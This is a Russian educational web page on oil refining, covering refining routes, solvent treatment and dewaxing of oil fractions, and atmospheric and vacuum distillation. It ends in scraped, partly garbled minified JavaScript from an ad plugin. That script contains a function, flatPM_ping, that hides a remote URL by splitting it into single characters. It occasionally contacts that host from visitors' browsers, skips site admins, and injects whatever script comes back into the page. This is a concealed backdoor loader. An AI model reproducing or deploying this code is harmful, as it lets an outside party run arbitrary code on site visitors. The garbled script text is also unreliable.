Масляные фракции (фракции, выкипающие выше 350° С), выделенные из нефти, сначала подвергают очистке избирательными растворителями фенолом или фурфуролом, чтобы удалить часть смолистых веществ и низкоиндексные углеводороды, затем проводят депарафиннзацию при помощи смесей метилэтилкетона или ацетона с толуолом для понижения температуры застывания масла.

Заканчивается обработка масляных фракций доочисткой отбеливающими глинами. [c.151]

    Основные методы переработки и аппаратура.

В зависимости от получаемых при переработке нефти продуктов существуют три варианта переработки нефти топливный с получением моторного и котельного топлив топливно-масляный, при котором получают топлива и смазочные масла, инефтехи ми -ческий (комплексный), при реализации которого получают не только топлива и масла, но и сырье для химической промышленности — олефины, ароматические и предельные углеводороды и др. [c.163]

Источник: https://www.chem21.info/info/66473/

Выбор направления переработки нефти

  • Выбор направления переработки нефти и ассортимента получаемых нефтепродуктов определяется физико-химическими свойствами нефти, уровнем технологии нефтеперерабатывающего завода и настоящей потребности хозяйств в товарных нефтепродуктах. Различают три основных варианта переработки нефти:
  • · топливный,
  • · топливно-масляный,
  • · нефтехимический.

По топливному варианту нефть перерабатывается в основном на моторные и котельные топлива. Топливный вариант переработки отличается наименьшим числом участвующих технологических установок и низкими капиталовложениями.

Различают глубокую и неглубокую топливную переработку. При глубокой переработке нефти стремятся получить максимально возможный выход высококачественных и автомобильных бензинов, зимних и летних дизельных топлив и топлив для реактивных двигателей. Выход котельного топлива в этом варианте сводится к минимуму.

Таким образом, предусматривается такой набор процессов вторичной переработки, при котором из тяжелых нефтяных фракций и остатка – гудрона получают высококачественные легкие моторные топлива. Сюда относятся каталитические процессы – каталитический крекинг, каталитический риформинг, гидрокрекинг и гидроочистка, а также термические процессы, например коксование.

Переработка заводских газов в этом случае направлена на увеличение выхода высококачественных бензинов. При неглубокой переработке нефти предусматривается высокий выход котельного топлива.

По топливно-масляному варианту переработки нефти наряду с топливами получают смазочные масла. Для производства смазочных масел обычно подбирают нефти с высоким потенциальным содержанием масляных фракций.

В этом случае для выработки высококачественных масел требуется минимальное количество технологических установок.

Масляные фракции (фракции, выкипающие выше 350°С), выделенные из нефти, сначала подвергаются очистке избирательными растворителями: фенолом или фурфуролом, чтобы удалить часть смолистых веществ и низкоиндексные углеводороды, затем проводят депарафинизацию при помощи смесей метилэтилкетона или ацетона с толуолом для понижения температуры застывания масла. Заканчивается обработка масляных фракций доочисткой отбеливающими глинами. Последние технологии получения масел используют процессы гидроочистки взамен селективной очистки и обработки отбеливающими глинами. Таким способом получают дистиллятные масла (легкие и средние индустриальные, автотракторные и др.). Остаточные масла (авиационные, цилиндровые) выделяют из гудрона путем его деасфальтизации жидким пропаном. При этом образуется деасфальт и асфальт. Деасфальт подвергается дальнейшей обработке, а асфальт перерабатывают в битум или кокс.

Нефтехимический вариант переработки нефти по сравнению с предыдущими вариантами отличается большим ассортиментом нефтехимической продукции и в связи с этим наибольшим числом технологических установок и высокими капиталовложениями.

Нефтеперерабатывающие заводы, строительство которых проводилось в последние два десятилетия, направлены на нефтехимическую переработку.

Нефтехимический вариант переработки нефти представляет собой сложное сочетание предприятий, на которых помимо выработки высококачественных моторных топлив и масел не только проводится подготовка сырья (олефинов, ароматических, нормальных и изопарафиновых углеводородов и др.

) для тяжелого органического синтеза, но и осуществляются сложнейшие физико-химические процессы, связанные с многотоннажным производством азотных удобрений, синтетического каучука, пластмасс, синтетических волокон, моющих веществ, жирных кислот, фенола, ацетона, спиртов, эфиров и многих других химикалий.

Принципы первичной переработки нефти.

Нефть представляет собой сложную смесь парафиновых, нафтеновых и ароматических углеводов, различных по молекулярному весу и температуре кипения. Кроме того, в нефти содержатся сернистые, кислородные и азотистые органические соединения.

Для производства многочисленных продуктов различного назначения и со специфическими свойствами применяют методы разделения нефти на фракции и группы углеводородов, а также изменения ее химического состава.

Различают первичные и вторичные методы переработки нефти:

· к первичным относят процессы разделения нефти на фракции, когда используются ее потенциальные возможности по ассортименту, количеству и качеству получаемых продуктов и полупродуктов – перегонка нефти;

· ко вторичным относят процессы деструктивной переработки нефти и очистки нефтепродуктов, предназначенные для изменения ее химического состава путем термического и каталитического воздействия. При помощи этих методов удается получить нефтепродукты заданного качества и в больших количествах, чем при прямой перегонке нефти.

Перегонка нефти.

Братья Дубинины впервые создали устройство для перегонки нефти. Завод Дубининых был очень прост. Котёл в печке, из котла идёт труба через бочку с водой в пустую бочку. Бочка с водой – холодильник, пустая бочка – приёмник для керосина.

Различают перегонку с однократным, многократным и постепенным испарением. При перегонке с однократным испарением нефть нагревают до определенной температуры и отбирают все фракции, перешедшие в паровую фазу.

Перегонка нефти с многократным испарением производится с поэтапным нагреванием нефти, и отбиранием на каждом этапе фракций нефти с соответствующей температурой перехода в паровую фазу.

Перегонку нефти с постепенным испарением в основном применяют в лабораторной практике для получения особо точного разделения большого количества фракций. Отличается от других методов перегонки нефти низкой производительностью.

Процесс первичной переработки нефти (прямой перегонки), с целью получения нефтяных фракций, различающихся по температуре кипения без термического распада, осуществляют в кубовых или трубчатых установках при атмосферном и повышенном давлениях или в вакууме.

Трубчатые установки отличаются более низкой достаточной температурой перегоняемого сырья, меньшим крекингом сырья, и большим КПД.

Поэтому на современном этапе нефтепереработки трубчатые установки входят в состав всех нефтеперерабатывающих заводов и служат поставщиками как товарных нефтепродуктов, так и сырья для вторичных процессов (термического и каталитического крекинга, риформинга).

В настоящее время перегонку нефти в промышленности производят на непрерывно действующих трубчатых установках. У них устраивается трубчатая печь, для конденсации и разделения паров сооружаются огромные ректификационные колонны, а для приёма продуктов перегонки выстраиваются целые городки резервуаров.

Трубчатая печь представляет собой помещение, выложенное внутри огнеупорным кирпичом. Внутри печи расположен многократно изогнутый стальной трубопровод. Длина труб в печах достигает километра.

Когда завод работает, по этим трубам непрерывно, с помощью насоса, подаётся нефть с большой скоростью – до двух метров в секунду. Печь обогревается горящим мазутом, подаваемым в неё при помощи форсунок. В трубопроводе нефть быстро нагревается до 350-370°.

При такой температуре более летучие вещества нефти превращаются в пар.

Так как нефть – это смесь углеводородов различного молекулярного веса, имеющих разные температуры кипения, то перегонкой её разделяют на отдельные нефтепродукты.

При перегонке нефти получают светлые нефтепродукты: бензин (tкип 90-200°С), лигроин (tкип 150-230°С), керосин (tкип180-300°С), легкий газойль – соляровое масло (tкип 230-350°С), тяжелый газойль (tкип 350-430°С), а в остатке – вязкую черную жидкость – мазут (tкип выше 430°С).

Мазут подвергают дальнейшей переработке. Его перегоняют под уменьшенным давлением (чтобы предупредить разложение) и выделяют смазочные масла.

При перегонке с однократным испарением нефть нагревают в змеевике какого-либо подогревателя до заранее заданной температуры.

По мере повышения температуры образуется все больше паров, которые находятся в равновесии с жидкой фазой, и при заданной температуре парожидкостная смесь покидает подогреватель и поступает в адиабатический испаритель.

Последний представляет собой пустотелый цилиндр, в котором паровая фаза отделяется от жидкой. Температура паровой и жидкой фаз в этом случае одна и та же.

Перегонка с многократным испарением состоит из двух или более однократных процессов перегонки с повышением рабочей температуры на каждом этапе.

Четкость разделения нефти на фракции при перегонке с однократным испарением хуже по сравнению с перегонкой с многократным и постепенным испарением.

Но если высокой четкости разделения фракций не требуется, то метод однократного испарения экономичнее: при максимально допустимой температуре нагрева нефти 350-370°С (при более высокой температуре начинается разложение углеводородов) больше продуктов переходит в паровую фазу по сравнению с многократным или постепенным испарением. Для отбора из нефти фракций, выкипающих выше 350-370°С, применяют вакуум или водяной пар. Использование в промышленности принципа перегонки с однократным испарением в сочетании с ректификацией паровой и жидкой фаз позволяет достигать высокой четкости разделения нефти на фракции, непрерывности процесса и экономичного расходования топлива на нагрев сырья.



Источник: https://infopedia.su/9x312b.html

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};